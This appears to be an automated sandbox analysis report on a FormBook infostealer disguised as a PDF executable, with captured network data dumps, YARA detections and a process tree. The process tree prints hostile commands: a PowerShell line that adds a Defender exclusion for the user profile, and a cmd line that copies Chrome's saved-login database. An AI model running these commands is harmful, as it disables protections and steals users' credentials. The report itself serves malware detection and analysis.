          Data Raw: 6e 72 43 78 4e 44 6b 3d 6b 6f 4a 33 31 72 61 77 34 46 42 4a 35 75 74 51 77 4d 4e 55 4d 43 50 38 64 4e 67 64 4b 44 6a 36 58 41 78 79 56 56 78 61 28 67 65 56 55 34 76 76 36 46 58 63 65 72 45 4a 51 6c 28 77 38 5a 4b 69 61 74 46 4a 58 4f 79 43 6a 41 63 71 4e 6d 66 69 62 77 31 33 65 53 65 48 6a 44 73 2d 6c 65 6b 62 58 30 6e 76 34 77 72 34 61 45 7a 43 41 6e 67 75 6b 30 6a 38 45 7a 63 61 49 56 51 41 64 64 34 53 6c 6c 6c 65 28 6e 39 6d 6c 6f 34 30 70 48 5a 68 75 5a 55 41 62 47 63 61 51 4c 78 47 4e 46 7e 46 30 5f 74 71 71 72 36 6a 45 6c 56 4b 47 33 48 6c 69 42 50 4c 6d 58 4e 2d 30 6e 51 78 6d 79 72 39 57 68 73 4f 77 32 4f 65 78 62 68 62 75 30 58 75 44 35 55 56 66 62 75 58 37 5f 51 55 31 41 41 74 7e 70 76 5a 6d 34 67 32 28 70 74 6c 46 64 39 6e 50 75 59 74 78 76 46 78 31 45 74 43 59 70 47 48 4a 7a 51 4b 56 2d 5a 36 7a 31 68 35 78 46 59 65 30 39 41 42 58 70 50 53 32 49 54 30 45 44 4b 36 6c 30 55 4a 76 68 34 50 46 42 4d 31 35 5a 71 7a 69 56 4f 54 38 6e 6a 5a 39 6c 28 30 30 44 74 4d 6a 39 50 52 73 43 30 70 43 7a [TRUNCATED]
          Data Ascii: nrCxNDk=koJ31raw4FBJ5utQwMNUMCP8dNgdKDj6XAxyVVxa(geVU4vv6FXcerEJQl(w8ZKiatFJXOyCjAcqNmfibw13eSeHjDs-lekbX0nv4wr4aEzCAnguk0j8EzcaIVQAdd4Sllle(n9mlo40pHZhuZUAbGcaQLxGNF~F0_tqqr6jElVKG3HliBPLmXN-0nQxmyr9WhsOw2Oexbhbu0XuD5UVfbuX7_QU1AAt~pvZm4g2(ptlFd9nPuYtxvFx1EtCYpGHJzQKV-Z6z1h5xFYe09ABXpPS2IT0EDK6l0UJvh4PFBM15ZqziVOT8njZ9l(00DtMj9PRsC0pCzdqhMURYziEEIqrx1S9riJCAitOZFpmQNBTHgeBJjreK-sohXlaX3eNJCfceFJoWic2b4ZQm31q3eHAoddjrjSRxD8FVfnkSWBbQIqJNI5etQJOtMt47cgdiBtXGFSP0PzpIy3sencnl2HwuOhaquko0MKQo4W8hq1aVGJGaHQ0BvTbDCwRKyZLS8uW9S9zVFVTjpQIJR6vXERjwTBQXrU_GeRvz6lZY9FrzD7fhdF5ODRdPPgSeuG2YXNQU-lvz-NnYsJjg-FXw38b(wHiBxaQjPGHu0QOIceuB4Gqk9qW5WP1Qa9yV7Aw4N6OxZBG7rQeBx6b2vtDUi(51xjNEYKCPpjLF86h8o71p5MDn6Cxz-3p7DzS7w~dlz3ZkOnEKqQpoDqJK-TznDaSmFbpDrHocI1OXe8ZbxE-8ibglqlC~1RSToHVMSf5hG24nMGvYwjADbApkAZ-mpfduVlNa9mIXaONfHmVYaXf~Cg2SYIpZwEla9xymwuz4vQBJ8ahmeYJJnGO3uGmoM22~IUBfEWn3AgSjljjM9WVTw~-yw17rlItqRejxGTrzBAZ2eMXgkeM(8HbTkrE6xPoHkTHAzsMvAfp7aicBJeJ380v0k(EmHxr4u8Xe6BywO(Y52yDeWsF4YKaEMlkUQjDP5cqO12nH31gVrplRJF8 [TRUNCATED]
          Sep 22, 2024 17:28:14.323553085 CEST14832OUTData Raw: 37 31 34 57 50 63 42 70 76 67 53 54 73 62 34 74 65 79 43 7a 57 66 6d 7e 38 46 41 6b 53 38 6b 6f 7a 46 33 72 48 58 5a 48 44 67 51 30 39 42 75 59 37 5a 34 56 6a 4e 71 63 5a 55 70 37 56 77 33 63 56 69 42 46 49 78 6a 50 77 64 50 79 52 4c 52 51 32 6d
          Data Ascii: 714WPcBpvgSTsb4teyCzWfm~8FAkS8kozF3rHXZHDgQ09BuY7Z4VjNqcZUp7Vw3cViBFIxjPwdPyRLRQ2mAmeLed9O75yK2T5KcXBs2Ztu3BwJTN_qa(tPbLi2A~hJhHJ(wxyaUUS8VW4lvyzv0yO(lvOJ7bZnEskpotniq~UoYbi8NLQnFB0yGkd2vDiDuGc1IXtiiWok3oWGgoJxIT8ANoj36~7skyEZbungMJ3Ma3v(0FPbr
          Sep 22, 2024 17:28:14.323587894 CEST4944OUTData Raw: 56 32 4d 57 5f 53 6c 70 75 28 6e 70 77 7a 6d 7e 32 52 49 36 69 44 4b 4e 39 66 38 68 31 50 4b 63 36 44 71 31 52 79 56 43 76 31 6c 59 63 4f 42 50 41 56 5a 57 63 45 54 46 34 61 63 51 49 70 69 78 78 7a 68 4c 76 62 32 6d 44 74 34 6d 61 4f 45 54 7a 39
          Data Ascii: V2MW_Slpu(npwzm~2RI6iDKN9f8h1PKc6Dq1RyVCv1lYcOBPAVZWcETF4acQIpixxzhLvb2mDt4maOETz9ZAlzaw7QKRDhh914UIkbdyhHzdklZg1Wwe6qK2TmzpFhxVaKw2Zb_liAEcbKpNe7SqAMUJWo2OQ1RPhdWTjxgltHdzgXXnAo3KLA2exhG6_bb~9Ti4-rG6fC9OSIBXlIl7-KpWvOiyqngV5Uhr0aQ40O1xANBeoxF
          Sep 22, 2024 17:28:14.324882984 CEST2472OUTData Raw: 30 4b 56 47 48 37 6e 52 4a 61 5a 31 5a 6e 6e 37 67 41 44 37 7a 56 79 42 58 4d 75 4e 2d 34 4e 73 67 4f 50 51 63 67 6e 31 59 5a 41 72 66 76 38 34 37 4c 43 51 69 35 65 4b 77 43 6b 28 63 35 6e 77 4f 37 74 42 30 49 79 57 39 55 56 5a 33 78 48 54 68 66
          Data Ascii: 0KVGH7nRJaZ1Znn7gAD7zVyBXMuN-4NsgOPQcgn1YZArfv847LCQi5eKwCk(c5nwO7tB0IyW9UVZ3xHThfn0Iqql2pH0_ygEO9v0F1SBiupG8fLMq7m37LZRtjTBwWJpe9P2j6s6Mx82tPUkolXWoMI5BZN7drP9vVVGbyStKT5vuZc54HQHuQttVGAix~-0pvdwkPIj_CsRLkd67p67brEQy7hO_r0WQzUqxotK3EYibzHtxru
          Sep 22, 2024 17:28:14.328644991 CEST7416OUTData Raw: 68 32 39 74 5a 52 36 35 48 4f 4e 71 43 50 6b 57 64 66 5f 50 33 57 56 63 4c 77 75 35 53 31 32 64 56 54 2d 71 30 73 74 47 76 57 6f 53 55 28 56 4b 68 34 39 64 55 44 4b 6f 31 45 61 38 4a 67 58 76 47 6d 37 6d 41 75 31 44 31 54 66 28 30 62 34 72 48 53
          Data Ascii: h29tZR65HONqCPkWdf_P3WVcLwu5S12dVT-q0stGvWoSU(VKh49dUDKo1Ea8JgXvGm7mAu1D1Tf(0b4rHSQj3lsWI0NdVudpLdmHgSUc2YhAJbEjyKAj4WlGZOWRFnhFaxbQ4JkysPUNX59zZDjBGo-p7jvPuaeAMl-izy-CGsqO6n4lNjprEiLFvhlET2b5A~Tcgj6s1(E7MqAkgPPRi(ip5qhsJfVFSYYy0r-GomZt6wn(3da
          Sep 22, 2024 17:28:14.328722954 CEST7416OUTData Raw: 44 67 46 30 6b 51 59 6b 67 48 68 66 4f 78 59 6c 6e 7e 42 71 38 7a 56 41 71 59 68 63 31 31 65 7e 32 44 69 43 48 58 49 53 56 68 62 37 4a 48 58 34 53 43 43 57 2d 33 71 73 70 5a 7a 49 34 41 55 6a 36 36 32 33 7a 4d 37 68 6a 48 65 64 4b 6e 4d 74 63 38
          Data Ascii: DgF0kQYkgHhfOxYln~Bq8zVAqYhc11e~2DiCHXISVhb7JHX4SCCW-3qspZzI4AUj6623zM7hjHedKnMtc8ykXod2wCXB5rd5W8vga47UgvxHvoxYVdqgr3yMHSjYKa1kFOGoDnojPsgfSLwY8cEdMLjSPNc5J~cR4razOF2bN7Fp7efV1EwUxyBXnonOcNFCggy~vxcv5Wp2D0z6yqJlPEPCu7G0tPe1pLIsPE6C-iEjv4PD8ei
          Sep 22, 2024 17:28:14.332803011 CEST2472OUTData Raw: 58 70 33 74 6c 6a 67 63 65 33 70 6c 72 75 42 52 68 42 32 4b 71 52 50 4c 56 68 47 7e 52 65 32 45 56 4b 37 53 43 6f 70 67 45 4d 72 66 51 4e 66 79 5a 4b 36 6b 57 67 54 31 47 72 45 34 65 74 78 43 6d 57 6e 4d 38 46 4a 4c 39 32 43 56 44 6f 36 6a 52 57
          Data Ascii: Xp3tljgce3plruBRhB2KqRPLVhG~Re2EVK7SCopgEMrfQNfyZK6kWgT1GrE4etxCmWnM8FJL92CVDo6jRWzcFtlS3gZsiQ-ykGGYKk1H5WSAeRhjtZ9zKFliAUq0QHN8AnSgZGAbWvPf5MHG0o8TVR6PUbrH-W1yFbakSwVp-5viaI932Wl3SR1soSn9Z13hJWt6b6hvvgSR8FTCYmYrvPgzaoXwWpFV0GIYqqGO2p1oWZCtNDG
          Sep 22, 2024 17:28:14.376902103 CEST34608OUTData Raw: 53 4b 73 50 53 72 74 4f 69 58 6d 63 48 58 4f 46 6a 73 6f 66 62 75 7a 65 64 76 73 32 32 6a 4d 58 74 33 46 4f 68 4c 51 57 4c 45 79 28 4f 53 48 30 5a 66 34 78 49 73 5f 6e 67 75 6a 6c 53 57 76 65 4e 73 67 66 61 6c 37 34 59 28 30 67 53 53 70 69 54 4e
          Data Ascii: SKsPSrtOiXmcHXOFjsofbuzedvs22jMXt3FOhLQWLEy(OSH0Zf4xIs_ngujlSWveNsgfal74Y(0gSSpiTNyvGR0YeoATuDyJ1v4YdXvxl4brZnqWNd01tXHIQICnlhKqMcV5ut3ajBnK-Xo2C45OuTc2Do_1bsLu0cHKQxTxpyNqKRN7mnZgmaOhD7YXHK6JQx3RH0m5buMZd(yKT7Y7NVJnYKqEUNpeFHK5eo9tKNupihhUIlW
          Sep 22, 2024 17:28:14.429254055 CEST1236OUTData Raw: 36 5a 53 67 4e 71 79 59 46 66 63 7e 72 63 38 70 65 53 61 78 50 65 49 6d 4c 57 41 35 36 78 53 35 41 7e 6f 73 67 71 6d 76 5f 38 63 79 4e 31 4c 79 6b 73 34 74 37 75 68 71 37 44 42 7e 53 47 43 56 4d 49 36 76 44 41 4b 38 4f 7a 6c 78 53 53 59 78 6e 77
          Data Ascii: 6ZSgNqyYFfc~rc8peSaxPeImLWA56xS5A~osgqmv_8cyN1Lyks4t7uhq7DB~SGCVMI6vDAK8OzlxSSYxnwr3IZJiDrjEFJgneS_xw17(-Z2LFJJ2QwR0hsgfmL-4qcBcvDJHb~Bf9~Zl9X7RGRTiq4bJNu6wOZCIN8iCHX-xtH-15kfR93jkAC9NGjOzjnEjQCaEfHMQ20Q30f0NThFJ7tOzHrBoU0iVK6wKSQjdQNwwKyePFi7
          Sep 22, 2024 17:28:14.484829903 CEST1236OUTData Raw: 38 6d 7a 43 58 69 4d 77 45 75 33 68 66 7a 30 37 58 6a 53 33 6b 33 74 42 46 41 75 6f 6f 69 77 6d 4b 63 35 63 64 6b 4f 6f 4f 75 72 72 68 57 79 48 31 4a 43 48 7a 70 5a 39 36 79 45 53 6c 37 55 61 72 28 33 5a 47 58 71 6d 37 4c 37 67 42 75 6e 6d 4d 64
          Data Ascii: 8mzCXiMwEu3hfz07XjS3k3tBFAuooiwmKc5cdkOoOurrhWyH1JCHzpZ96yESl7Uar(3ZGXqm7L7gBunmMd459Fa6O2tuGxal-(C5Ru9(ZJqFu5lc0o_UCMMchvqVU3Vt4891BgRHPCifQSvICWZs49p77mSpkGNoeh5Is(eKfKT~hG0OwxRkyVSZUSTa8awqu~vEYdKIxi2IJv4ubpG1H7rdgObtcMb0KG21QuF2AYl33G27HND
          Sep 22, 2024 17:28:14.540827990 CEST1236OUTData Raw: 43 39 35 31 42 52 55 6f 4d 6f 47 4d 68 75 37 50 5a 6e 38 28 4d 37 75 4b 34 45 64 59 41 66 53 63 31 6f 69 67 42 65 69 39 37 5a 35 65 47 72 69 78 79 63 73 35 76 43 57 56 70 4f 63 28 7a 50 6a 77 56 54 51 6f 44 74 74 50 6c 70 4d 28 53 35 41 69 42 7a
          Data Ascii: C951BRUoMoGMhu7PZn8(M7uK4EdYAfSc1oigBei97Z5eGrixycs5vCWVpOc(zPjwVTQoDttPlpM(S5AiBzUV-mTs02nBkBC6xSsPTeJ(Tyn7A~HJL9mcV6lIbrMcGPRH7NGlFH0RG9CRDl4gyoOMewQmAE8g4qdmq9tikIXMYznQ_IbyWISnxUKW8LDp99iYIPr4UCM8wiQ25(SzaR4aAN0Ys3uf4M2X0YBff~TKeJLcDL6lkyl


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:11:25:07
          Start date:22/09/2024
          Path:C:\Users\user\Desktop\Specification and Quantity Pdf.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\Specification and Quantity Pdf.exe"
          Imagebase:0x7ff773c50000
          File size:1'678'432 bytes
          MD5 hash:686FED0AF9EEBB2581701D4E08E9FF0B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:11:25:07
          Start date:22/09/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff75da10000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:11:25:07
          Start date:22/09/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
          Imagebase:0x7ff741d30000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:4
          Start time:11:25:07
          Start date:22/09/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff75da10000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:11:25:08
          Start date:22/09/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):
          Commandline:"C:\Windows\System32\svchost.exe"
          Imagebase:
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:false

          Target ID:6
          Start time:11:25:08
          Start date:22/09/2024
          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
          Imagebase:0x260000
          File size:166'912 bytes
          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:moderate
          Has exited:true

          Target ID:8
          Start time:11:25:09
          Start date:22/09/2024
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\Explorer.EXE
          Imagebase:0x7ff70ffd0000
          File size:5'141'208 bytes
          MD5 hash:662F4F92FDE3557E86D110526BB578D5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000008.00000002.3767102018.0000000010A5F000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          Reputation:high
          Has exited:false

          Target ID:9
          Start time:11:25:11
          Start date:22/09/2024
          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Imagebase:0x7ff7fb730000
          File size:496'640 bytes
          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:10
          Start time:11:25:12
          Start date:22/09/2024
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\rundll32.exe"
          Imagebase:0xe90000
          File size:61'440 bytes
          MD5 hash:889B99C52A60DD49227C5E485A016679
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:false

          Target ID:12
          Start time:11:25:17
          Start date:22/09/2024
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V
          Imagebase:0x410000
          File size:236'544 bytes
          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:13
          Start time:11:25:18
          Start date:22/09/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff75da10000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:15
          Start time:12:31:03
          Start date:22/09/2024
          Path:C:\Program Files\Mozilla Firefox\firefox.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
          Imagebase:0x7ff722870000
          File size:676'768 bytes
          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:5.6%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:23.3%
            Total number of Nodes:981
            Total number of Limit Nodes:48
            execution_graph 30158 7ff773c6df50 45 API calls 30264 7ff773c6d9ea SleepEx WaitForSingleObject SwitchToThread SwitchToThread 30159 7ff773d0f100 88 API calls 30161 7ff773c74cd9 VirtualAlloc VirtualUnlock _swprintf_c_l 30162 7ff773c87c37 50 API calls ISource 30163 7ff773c6d8c7 53 API calls 30223 7ff773c642e0 GetCurrentThreadId SleepEx malloc RtlPcToFileHeader RaiseException 30188 7ff773c553e0 WaitForMultipleObjectsEx SetLastError CoWaitForMultipleHandles SetLastError 30265 7ff773c51a08 85 API calls 30189 7ff773d0fbe0 LocaleNameToLCID 30167 7ff773c66910 15 API calls 2 library calls 30191 7ff773c6df97 18 API calls 30228 7ff773c55710 SetEvent 30229 7ff773c6ab10 DebugBreak DebugBreak 30268 7ff773ce3a00 96 API calls 30193 7ff773c8a7b0 39 API calls 30271 7ff773ce31b0 91 API calls 28979 7ff773ce8fb0 28980 7ff773ce8fea 28979->28980 28981 7ff773ce9017 GetLocaleInfoEx 28980->28981 28982 7ff773ce9036 28981->28982 28984 7ff773ce9048 28982->28984 28985 7ff773cd40f0 85 API calls 28982->28985 28985->28984 28986 7ff773c7c9b6 28987 7ff773c7c9bf 28986->28987 28990 7ff773c7c9da ISource 28986->28990 29088 7ff773c90c30 QueryPerformanceCounter 28987->29088 28989 7ff773c7c9ce 28991 7ff773c7d127 28989->28991 29099 7ff773c6bdb0 46 API calls 28989->29099 28992 7ff773c7ca3e 28990->28992 29089 7ff773c767f0 VirtualFree 28990->29089 29029 7ff773c8adb0 28992->29029 28998 7ff773c7cab5 29041 7ff773c7dfd0 28998->29041 29000 7ff773c7ca48 _swprintf_c_l 29000->28998 29090 7ff773c8d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29000->29090 29001 7ff773c7cad4 29056 7ff773c82370 29001->29056 29004 7ff773c7caff 29006 7ff773c7cb25 29004->29006 29091 7ff773c60130 29004->29091 29060 7ff773c7a330 29006->29060 29010 7ff773c7cc2b 29012 7ff773c7cc3d EnterCriticalSection 29010->29012 29013 7ff773c7d0c5 29010->29013 29011 7ff773c7cc10 29011->29010 29097 7ff773c91200 28 API calls _swprintf_c_l 29011->29097 29015 7ff773c7cd1e LeaveCriticalSection 29012->29015 29016 7ff773c7ccbd 29012->29016 29017 7ff773c7d0cc GetTickCount64 29013->29017 29020 7ff773c7cd03 29015->29020 29016->29015 29098 7ff773c5bc10 7 API calls 29016->29098 29017->28989 29019 7ff773c7ccdf 29019->29015 29021 7ff773c7ccec LeaveCriticalSection 29019->29021 29022 7ff773c7cf64 29020->29022 29024 7ff773c74020 7 API calls 29020->29024 29026 7ff773c7ce69 29020->29026 29021->29020 29022->29013 29022->29017 29022->29022 29078 7ff773c79980 29022->29078 29023 7ff773c7cf19 29023->29022 29028 7ff773c79980 4 API calls 29023->29028 29024->29020 29026->29023 29027 7ff773c7a330 13 API calls 29026->29027 29027->29023 29028->29022 29030 7ff773c7ca43 29029->29030 29031 7ff773c8adc2 _swprintf_c_l 29029->29031 29033 7ff773c6e5f0 29030->29033 29031->29030 29100 7ff773c8d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29031->29100 29034 7ff773c6e614 _swprintf_c_l 29033->29034 29039 7ff773c6e6e0 _swprintf_c_l 29034->29039 29101 7ff773c8d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29034->29101 29102 7ff773c90e70 DebugBreak DebugBreak DebugBreak DebugBreak 29034->29102 29035 7ff773c6e7d0 29035->29000 29039->29035 29103 7ff773c8d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29039->29103 29104 7ff773c90e70 DebugBreak DebugBreak DebugBreak DebugBreak 29039->29104 29042 7ff773c7e084 29041->29042 29044 7ff773c7e1ea 29042->29044 29112 7ff773c61630 QueryPerformanceCounter 29042->29112 29049 7ff773c7e38d 29044->29049 29113 7ff773c6d390 24 API calls 29044->29113 29046 7ff773c7e356 29047 7ff773c7e414 29046->29047 